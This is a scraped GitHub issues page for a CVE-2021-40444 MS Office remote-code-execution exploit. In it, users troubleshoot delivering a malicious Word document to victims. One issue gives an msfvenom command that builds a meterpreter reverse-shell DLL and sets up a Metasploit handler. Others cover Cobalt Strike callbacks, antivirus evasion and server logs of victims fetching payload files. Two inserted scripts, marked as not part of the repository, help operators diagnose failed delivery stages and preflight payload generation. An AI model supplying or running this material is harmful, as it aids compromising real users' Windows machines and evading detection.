
cve-2021-40444's Introduction

N-day Exploits

  • CVE-2019-18634: Linux sudo LPE exploit for a stack-based buffer overflow in tgetpass.c
  • CVE-2020-28018: Linux Exim RCE exploit for a Use-After-Free in tls-openssl.c
  • CVE-2020-9273: Linux ProFTPd RCE exploit for a Use-After-Free in pool allocator
  • CVE-2021-3156: Linux LPE exploit for a heap-based buffer overflow in sudo
  • CVE-2021-40444: Microsoft Windows RCE exploit for an MS Office bug chain
  • CVE-2022-0185: Linux Kernel LPE exploit for an integer underflow in fs_context.c
  • CVE-2022-2586: Linux Kernel LPE exploit for an nft_object Use-After-Free

Talk slides

Blog posts

Other projects

  • Protcheck: Parse ELF executables to identify enabled memory mitigations

cve-2021-40444's People

Contributors

lockedbyte, prcabral


cve-2021-40444's Issues

Learn the production of exploit.html

Hello, can you explain how exploit.html is implemented? For example, if I just want to download a specified file first and save it in a specified directory, how can I achieve that?

code 404, message File not found

┌──(root💀Kali)-[/home/king]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.175.139 - - [08/Oct/2021 23:11:32] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:32] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:32] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:32] "HEAD /word.html HTTP/1.1" 404 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:35] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:35] "GET /word.html HTTP/1.1" 404 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:35] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:35] "HEAD /word.html HTTP/1.1" 404 -

championship.inf

When I finish executing maldoc.docx in the VM, there is no championship.inf file at C:\Users\<user>\AppData\Temp\
What should I do?

Metasploit not sending stage

I created my own .dll using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll

Generated the malicious docx given the dll above: sudo python3 exploit.py generate print.dll http://mypi

Shared the docx with my victim PC and set metasploit as listener:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost myip
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on myip:4444

Set up the server to transmit the other files: sudo python3 exploit.py host 80

File opens ok and I can see the connection attempt to my server, and I'm getting the following messages on port 80:

xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:28] "HEAD /word.html HTTP/1.1" 200 -

But Metasploit stays in the listening state, with no changes.

If I execute on the victim's PowerShell the command: rundll32 print.dll, start
Metasploit sets the stage successfully and I can control the victim's PC, which indicates the DLL is not the issue.

Any tips on how to troubleshoot?

sh: 1: zip: not found

I am running into an issue when I execute the script per the instructions.
After

[*] Generating malicious docx file

I get an error

sh: 1: zip: not found

And then there is no file in out

I am running this on a fresh Lightsail Ubuntu 20.04 VM

Antivirus

Document is detected by windows defender

Linking the server to my IP

Hi. The exploit does not call back to Cobalt Strike. I did everything according to the instructions, generated my DLL in Cobalt Strike (it is on the VPS), then ran python3 exploit.py host 80

Logs:
::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:41:50] code 404, message File not found
::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:41:50] "GET /srv/artifact.dll HTTP/1.1" 404 -
::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:42:07] "GET /word.cab HTTP/1.1" 200 -
::ffff:xxx.xxx.xxx.xx - - [16/Oct/2021 11:42:52] code 501, message Unsupported method ('OPTIONS')
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:52] "OPTIONS / HTTP/1.1" 501 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:52] "HEAD /word.html HTTP/1.1" 200 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] code 501, message Unsupported method ('OPTIONS')
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] "OPTIONS / HTTP/1.1" 501 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] "GET /word.html HTTP/1.1" 200 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "HEAD /word.html HTTP/1.1" 200 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "HEAD /word.html HTTP/1.1" 200 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] code 501, message Unsupported method ('OPTIONS')
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "OPTIONS / HTTP/1.1" 501 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] "HEAD /word.html HTTP/1.1" 200 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] code 501, message Unsupported method ('OPTIONS')
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] "OPTIONS / HTTP/1.1" 501 -
::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:56] "GET /word.html HTTP/1.1" 304 -
::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:56] "HEAD /word.html HTTP/1.1" 200 -
::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:57] "HEAD /word.html HTTP/1.1" 200 -
::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:57] "GET /word.cab HTTP/1.1" 200 -
In the terminal on the VPS, requests show, but nothing is shown in Cobalt Strike.
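The three issues above ("code 404, message File not found", "Metasploit not sending stage" and this one) all paste the same kind of python3 -m http.server log and ask the same question: which stage of the delivery chain failed? The log only shows the two server-side stages, Word fetching the HTML page (HEAD and GET) and then fetching the CAB; everything after the CAB download (extraction, the .inf, the DLL load) happens on the client and leaves no line here. The script below is an added example, not part of the lockedbyte repository: it parses the log format shown in these issues and reports which stage the requests reached. The sample log lines are constructed (made-up hosts and timestamps, modelled on the logs quoted above), the verdict names are mine, and the path names /word.html and /word.cab are taken from the logs rather than from the exploit source.

```python
import re

# Constructed sample logs in the format `python3 -m http.server` prints,
# modelled on the logs quoted in the issues above. Hosts/timestamps are made up.
LOG_SERVER_OK = """\
192.0.2.10 - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
192.0.2.10 - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
192.0.2.10 - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
192.0.2.10 - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
192.0.2.10 - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
"""

LOG_HTML_MISSING = """\
192.0.2.10 - - [08/Oct/2021 23:11:32] "OPTIONS / HTTP/1.1" 501 -
192.0.2.10 - - [08/Oct/2021 23:11:32] code 404, message File not found
192.0.2.10 - - [08/Oct/2021 23:11:32] "HEAD /word.html HTTP/1.1" 404 -
192.0.2.10 - - [08/Oct/2021 23:11:35] "GET /word.html HTTP/1.1" 404 -
"""

LOG_IPV6_MAPPED = """\
::ffff:192.0.2.10 - - [16/Oct/2021 11:41:50] "GET /srv/artifact.dll HTTP/1.1" 404 -
::ffff:192.0.2.10 - - [16/Oct/2021 11:42:53] "GET /word.html HTTP/1.1" 200 -
::ffff:192.0.2.10 - - [16/Oct/2021 11:42:57] "GET /word.cab HTTP/1.1" 200 -
"""

# One request line:  host - - [timestamp] "METHOD path HTTP/x.y" status -
REQUEST_RE = re.compile(
    r'^(?P<host>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)


def parse_requests(log_text):
    """Return one dict per request line. The 'code NNN, message ...' lines that
    http.server prints before an error response carry no extra information
    (the request line that follows has the same status), so they are skipped."""
    reqs = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            reqs.append(rec)
    return reqs


def diagnose(log_text, html="/word.html", cab="/word.cab"):
    """Map the server log onto the two server-side stages visible in the issues:
    Word fetching the HTML page (HEAD and/or GET), then fetching the CAB.
    A 304 counts as a successful fetch (the client already holds a cached copy)."""
    reqs = parse_requests(log_text)
    served = {200, 304}
    html_served = any(r["path"] == html and r["status"] in served for r in reqs)
    html_404 = any(r["path"] == html and r["status"] == 404 for r in reqs)
    cab_served = any(r["path"] == cab and r["method"] == "GET"
                     and r["status"] in served for r in reqs)
    cab_404 = any(r["path"] == cab and r["status"] == 404 for r in reqs)
    # 404s for anything else (e.g. a C2 artifact requested with the wrong path)
    other_404 = sorted({r["path"] for r in reqs
                        if r["status"] == 404 and r["path"] not in (html, cab)})
    # Every log on the page shows OPTIONS -> 501, including the ones where the
    # CAB is later served, so these are noise rather than a failure.
    options_501 = sum(1 for r in reqs
                      if r["method"] == "OPTIONS" and r["status"] == 501)

    if html_404 and not html_served:
        verdict = "html_missing"        # wrong directory, port, or URL baked into the docx
    elif html_served and cab_404:
        verdict = "cab_missing"
    elif html_served and cab_served:
        verdict = "server_side_ok"      # both stages reached: look at the client side
    elif html_served:
        verdict = "cab_not_requested"   # page fetched, Word never asked for the CAB
    else:
        verdict = "no_exploit_requests"
    return {"verdict": verdict, "html_served": html_served,
            "cab_served": cab_served, "other_404": other_404,
            "options_501": options_501, "requests": len(reqs)}


if __name__ == "__main__":
    for name, log in (("server_ok", LOG_SERVER_OK),
                      ("html_missing", LOG_HTML_MISSING),
                      ("ipv6_mapped", LOG_IPV6_MAPPED)):
        print(name, diagnose(log))
```

Run it against a saved copy of the server's stdout (or replace the constructed samples with your own log). A server_side_ok verdict with no callback, which is exactly the Metasploit poster's situation, means the web server did its part; the remaining suspects are the client-side stages, which is consistent with that poster confirming the DLL itself works when loaded with rundll32. A 404 on a path other than the two exploit files, like /srv/artifact.dll in the Cobalt Strike log, is reported separately because it usually means the DLL URL embedded elsewhere does not match the directory being hosted.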

Anti Anti- Virus

Which part of this exploit chain needs to be made AV-evasive when it is used? The DLL trojan, or the file pointed to by the update link in the docx document?

Cannot install lcab

sudo apt-get update
sudo apt-get install lcab
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package lcab is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'lcab' has no installation candidate

Works intermittently

I am seeing Word intermittently drop msword.inf in %TEMP%. I click the Word document, it works. Close Word. Clean %TEMP% out. Then click the Word document again, and it does not work. I see consistent GET requests for the cab file each time the Word document is opened. Any help would be greatly appreciated to get Word to drop consistently.

No such file or directory: 'out.cab'

Getting this error while generating a docx:

<snip>
 adding: word/_rels/document.xml.rels (deflated 75%)
[*] Generating malicious CAB file...
Traceback (most recent call last):
  File "exploit.py", line 154, in <module>
    generate_payload()
  File "exploit.py", line 106, in generate_payload
    patch_cab('out.cab')
  File "exploit.py", line 38, in patch_cab
    f_r = open(path, 'rb')
FileNotFoundError: [Errno 2] No such file or directory: 'out.cab'

question

Hi, I have a question about the generation of the cab: why is this content added to the cab file?
image
I want to add a VBS to the cab; do I need to modify the content at this place?

question

how to combine metasploit and ngrok for different networks?

Error while generating payload

This is the error

[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
[*] Option is generate a malicious payload...

[ == Options == ]
[ DLL Payload: test/calc.dll
[ HTML Exploit URL: http://192.168.1.2

[*] Writing HTML Server URL...
[*] Generating malicious docx file...
sh: 1: zip: not found
[*] Generating malicious CAB file...
[*] Updating information on HTML exploit...
Traceback (most recent call last):
  File "/home/rmb/CVE-2021-40444/exploit.py", line 154, in <module>
    generate_payload()
  File "/home/rmb/CVE-2021-40444/exploit.py", line 119, in generate_payload
    p_exp = open('word.html', 'r')
OSError: [Errno 22] Invalid argument: 'word.html'

How can I fix that?
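The four generation failures reported above ("sh: 1: zip: not found", "Cannot install lcab", "No such file or directory: 'out.cab'" and this one) are one cascade: a tool the generator shells out to is absent, the step that needed it produces no file, and the next step falls over on the missing file. The tracebacks show that the script keeps going after the failed shell command, so the most useful fix on the operator's side is a preflight check before running it. The script below is an added example, not part of the lockedbyte repository. That the generator needs zip is confirmed by the "sh: 1: zip: not found" output; that it needs lcab is an assumption drawn from the "Cannot install lcab" issue. The PE header check is included because the Metasploit issue shows the payload is an msfvenom-built DLL, which must be a valid PE image.

```python
import shutil

# Tools the generator appears to shell out to. zip is confirmed by the
# "sh: 1: zip: not found" output; lcab is assumed from the lcab install issue.
REQUIRED_TOOLS = ("zip", "lcab")


def missing_tools(names=REQUIRED_TOOLS):
    """Return the subset of `names` not found on PATH, in the order given."""
    return [n for n in names if shutil.which(n) is None]


def check_dll_header(data):
    """A Windows DLL is a PE image: 'MZ' at offset 0 and 'PE\\0\\0' at the
    offset stored in the little-endian dword at 0x3C (e_lfanew).
    Returns None when the header looks right, else a short problem string."""
    if len(data) < 0x40:
        return "file too small to be a PE image"
    if data[:2] != b"MZ":
        return "missing MZ signature (not a PE file)"
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    if pe_off + 4 > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return "e_lfanew does not point at a PE signature"
    return None


def preflight(dll_path, tools=REQUIRED_TOOLS):
    """Collect every problem that would otherwise surface as a late traceback:
    tools missing from PATH and a payload that is unreadable or not a PE DLL."""
    problems = ["tool not on PATH: %s" % t for t in missing_tools(tools)]
    try:
        with open(dll_path, "rb") as f:
            err = check_dll_header(f.read())
    except OSError as e:
        problems.append("cannot read payload %s: %s" % (dll_path, e.strerror))
    else:
        if err:
            problems.append("payload %s: %s" % (dll_path, err))
    return problems


# Constructed minimal PE header (DOS stub zeroed, e_lfanew = 0x40) for testing.
MINIMAL_PE = b"MZ" + b"\0" * (0x3C - 2) + (0x40).to_bytes(4, "little") + b"PE\0\0"


if __name__ == "__main__":
    import sys
    # Hypothetical usage: python3 preflight.py path/to/payload.dll
    issues = preflight(sys.argv[1] if len(sys.argv) > 1 else "print.dll")
    for p in issues:
        print("[!]", p)
    sys.exit(1 if issues else 0)
```

Run it with the DLL you intend to hand to the generator; an empty problem list means both tools resolve on PATH and the payload has a PE header. It does not validate anything inside the CAB or the HTML, which is where the "Works intermittently" and Win7 issues live.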

About win7 ?

I was able to execute successfully on win10, but in win7, I encountered the following situations:
image
successfully got the cab, but the HEAD request failed

How can I fix it

[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
[*] Option is host HTML Exploit...
Traceback (most recent call last):
  File "/usr/lib/python3.9/runpy.py", line 197, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.9/runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "/usr/lib/python3.9/http/server.py", line 1290, in <module>
    test(
  File "/usr/lib/python3.9/http/server.py", line 1245, in test
    with ServerClass(addr, HandlerClass) as httpd:
  File "/usr/lib/python3.9/socketserver.py", line 452, in __init__
    self.server_bind()
  File "/usr/lib/python3.9/http/server.py", line 1288, in server_bind
    return super().server_bind()
  File "/usr/lib/python3.9/http/server.py", line 138, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
